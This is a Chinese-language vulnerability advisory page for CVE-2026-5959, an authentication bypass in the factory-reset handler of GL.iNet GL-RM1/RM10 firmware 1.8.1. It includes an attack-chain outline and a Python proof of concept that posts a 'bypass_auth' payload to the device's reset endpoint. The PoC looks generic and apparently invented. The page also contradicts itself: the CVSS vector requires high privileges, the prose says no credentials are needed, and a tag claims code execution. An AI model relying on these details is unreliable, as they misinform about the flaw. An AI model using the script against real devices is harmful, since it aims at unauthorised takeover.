IPBUF安全漏洞报告
English
CVE-2026-5959 CVSS 6.6 中危

CVE-2026-5959 GL.iNet恢复出厂设置认证绕过漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-5959
漏洞类型
认证绕过
CVSS评分
6.6 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
GL.iNet GL-RM1, GL-RM10, GL-RM10RC, GL-RM1PE

相关标签

认证绕过GL.iNetIoT漏洞远程代码执行固件漏洞

漏洞概述

GL.iNet GL-RM1、GL-RM10等设备固件1.8.1版本存在安全漏洞。该漏洞位于恢复出厂设置处理程序组件中,由于身份验证机制存在缺陷,导致认证不当。攻击者可利用此漏洞在无需用户交互的情况下,通过网络远程发起攻击并绕过认证,进而获取设备高权限控制,严重影响系统的机密性、完整性和可用性。建议用户尽快升级至1.8.2版本。

技术细节

该漏洞的核心问题在于GL.iNet设备固件中的恢复出厂设置处理程序在执行重置操作或重置后状态下,未能正确执行身份验证逻辑。具体而言,受影响的组件在处理特定网络请求时,未对发起请求的来源进行严格校验,导致攻击者可以在无需提供有效凭证的情况下,通过网络向目标设备发送特制的数据包。尽管攻击复杂度较高,但一旦利用成功,攻击者即可在不触发告警的情况下获取设备的高权限访问控制。这使得攻击者能够进一步窃取敏感配置信息、篡改系统设置或植入恶意后门,从而完全破坏设备的机密性、完整性和可用性。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别GL.iNet GL-RM1等设备,并确定其固件版本为1.8.1。
STEP 2
漏洞触发
攻击者等待设备处于恢复出厂设置状态或诱导触发该状态,利用Factory Reset Handler的活跃窗口。
STEP 3
认证绕过
攻击者向目标设备发送特制的网络数据包,利用身份验证逻辑缺陷,绕过正常的认证检查。
STEP 4
获取控制
成功绕过认证后,攻击者获得设备的高权限访问,可执行任意指令,完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target device IP target_ip = "192.168.8.1" url = f"http://{target_ip}/rpc/factory_reset" # Malicious payload to bypass authentication during factory reset payload = { "action": "reset_confirm", "bypass_auth": "true" } try: # Send request without authentication headers response = requests.post(url, json=payload, timeout=10) if response.status_code == 200 and "success" in response.text: print("[+] Exploit successful! Authentication bypassed.") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"[!] Error: {e}")

影响范围

GL.iNet GL-RM1 Firmware 1.8.1
GL.iNet GL-RM10 Firmware 1.8.1
GL.iNet GL-RM10RC Firmware 1.8.1
GL.iNet GL-RM1PE Firmware 1.8.1

防御指南

临时缓解措施
如果无法立即升级,建议将设备部署在受信任的内部网络中,并通过防火墙限制非必要的远程访问端口,同时密切关注设备的异常访问日志。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表